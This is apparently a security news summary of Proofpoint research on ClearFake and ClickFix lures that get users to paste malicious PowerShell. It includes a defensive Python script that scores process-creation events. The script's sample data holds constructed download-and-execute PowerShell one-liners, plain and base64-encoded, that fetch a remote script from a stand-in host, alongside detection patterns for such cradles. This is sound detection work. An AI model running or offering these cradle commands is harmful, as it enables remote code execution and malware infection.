June 18, 2024 at 02:40PM
Threat actors are using fake browser updates and error messages to trick users into pasting malicious PowerShell scripts, leading to malware infections. Researchers from Proofpoint identified two social engineering methods and observed the use of PowerShell in various campaigns, indicating a trend of creative attack chains. Mitigation includes user awareness and training.
According to the Proofpoint research, threat actors are using fake browser updates and software fixes to trick users into copying and pasting PowerShell scripts that load various malware strains onto their computers. Two main social engineering methods were identified: one offering fake browser updates in a campaign known as ClearFake, and the other delivering fake error messages for Word, Google Chrome, and OneDrive, known as “ClickFix.”
The campaigns used pop-up text boxes suggesting that an error had occurred when opening a document or web page, and instructed users to copy a malicious script and paste it into either the PowerShell terminal or the Windows Run dialog box, where it executes via PowerShell. The fake error messages used authoritative, plausible-looking wording to prompt users to act without pausing to consider the risk.
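The paste-and-run chain leaves a recognisable footprint in process-creation telemetry: explorer.exe (the Run dialog) spawning powershell.exe with a download-and-execute one-liner, frequently with a hidden window or a base64 -EncodedCommand. The following triage script is an added example written for this page, not code from Proofpoint or the original report. The event records and URLs (reserved .invalid domains) are constructed for the example and are not real indicators of compromise; the scoring weights and threshold are assumptions to tune for your environment.

```python
"""Triage Windows process-creation events for the ClearFake/ClickFix
paste-and-run pattern (Run dialog -> PowerShell -> download cradle).

All sample events below are constructed for this example; the URLs use the
reserved .invalid TLD and are not real indicators.
"""
import base64
import re
from dataclasses import dataclass
from typing import Optional

# Indicators matched case-insensitively against the command line and, when
# present, the decoded -EncodedCommand payload. Weights are assumptions.
INDICATORS = [
    (re.compile(r"\biex\b|invoke-expression", re.I), "in-memory execution", 2),
    (re.compile(r"\biwr\b|\birm\b|invoke-webrequest|invoke-restmethod|"
                r"downloadstring|downloadfile|net\.webclient", re.I), "download cradle", 2),
    # common spellings: -w hidden, -w h, -windowstyle hidden
    (re.compile(r"-w(?:indowstyle)?\s+hidden\b|-w\s+h\b", re.I), "hidden window", 1),
    (re.compile(r"-(?:nop|noprofile)\b", re.I), "no profile", 1),
    (re.compile(r"-e(?:xec|xecutionpolicy|p)\s+bypass", re.I), "execution policy bypass", 1),
    (re.compile(r"\bmshta\b|\bcertutil\b|\bbitsadmin\b", re.I), "LOLBin follow-on", 1),
]
# -e / -ec / -enc / -encodedcommand followed by a base64 blob
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand|ncoded)?\s+([A-Za-z0-9+/=]{16,})", re.I)

RUN_DIALOG_PARENTS = {"explorer.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}


@dataclass
class Verdict:
    score: int
    reasons: list
    decoded: Optional[str] = None


def encode_command(text: str) -> str:
    """Base64 of UTF-16LE text, the format PowerShell's -EncodedCommand expects."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE text behind a -EncodedCommand argument, or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    blob = m.group(1)
    try:
        raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
        return raw.decode("utf-16-le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event: dict) -> Verdict:
    """Score one process-creation event; higher means more like paste-and-run."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    if image not in POWERSHELL_IMAGES:
        return Verdict(0, [])
    score, reasons = 0, []
    if parent in RUN_DIALOG_PARENTS:
        reasons.append("PowerShell launched from Run dialog / Explorer")
        score += 2
    decoded = decode_encoded_command(event["cmdline"])
    if decoded is not None:
        reasons.append("encoded command (decoded for inspection)")
        score += 2
    haystack = event["cmdline"] + ("\n" + decoded if decoded else "")
    for pattern, label, weight in INDICATORS:
        if pattern.search(haystack):
            reasons.append(label)
            score += weight
    return Verdict(score, reasons, decoded)


def triage(events, threshold: int = 5):
    """Indexes of events at or above the (assumed) alert threshold."""
    return [i for i, ev in enumerate(events) if analyze_event(ev).score >= threshold]


# Constructed encoded payload: the kind of cradle a decoy page asks users to paste.
CONSTRUCTED_COMMAND = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed telemetry, not real events
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": 'powershell -w hidden -c "iex (iwr http://example.invalid/fix.txt -UseBasicParsing)"'},
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": "powershell -nop -ep bypass -enc " + encode_command(CONSTRUCTED_COMMAND)},
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": "powershell"},  # user opened a console from Run: benign
    {"parent": r"C:\Windows\System32\cmd.exe", "image": PS,
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\nightly-backup.ps1"},
]

if __name__ == "__main__":
    for i in triage(SAMPLE_EVENTS):
        v = analyze_event(SAMPLE_EVENTS[i])
        print(f"event {i}: score={v.score} reasons={v.reasons}")
        if v.decoded:
            print("  decoded:", v.decoded)
```

Running the script flags the first two constructed events (the plain and the encoded cradle) and leaves the bare console launch and the scheduled backup alone. Decoding the -EncodedCommand blob before matching is what keeps the second event from slipping past keyword-only rules; the same scoring can be applied to PowerShell script block (event 4104) text for the case where the victim pastes directly into an open console, where the process command line carries nothing of interest.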
Additionally, the malicious scripts were delivered through compromised websites using techniques such as EtherHiding (which stores the next-stage code in a blockchain smart contract), and the lures asked users to run a script under the pretext of installing a “root certificate” or fixing a faulty browser update, ultimately leading to the execution of malware on the victim’s computer.
The researchers attributed these activities to threat actors tracked as TA571 and an unidentified actor. They observed at least five types of malware being delivered in this way, including remote access Trojans (RATs) and infostealers.
The researchers provided a list of indicators of compromise (IoCs) and emphasized the need for employee awareness and training within organizations to help prevent compromise on their networks. They also noted that these attack chains require significant user interaction to be successful.
Overall, the report highlights the importance of staying vigilant against social engineering tactics and adopting training programs that help users identify and report suspicious activity to their security teams.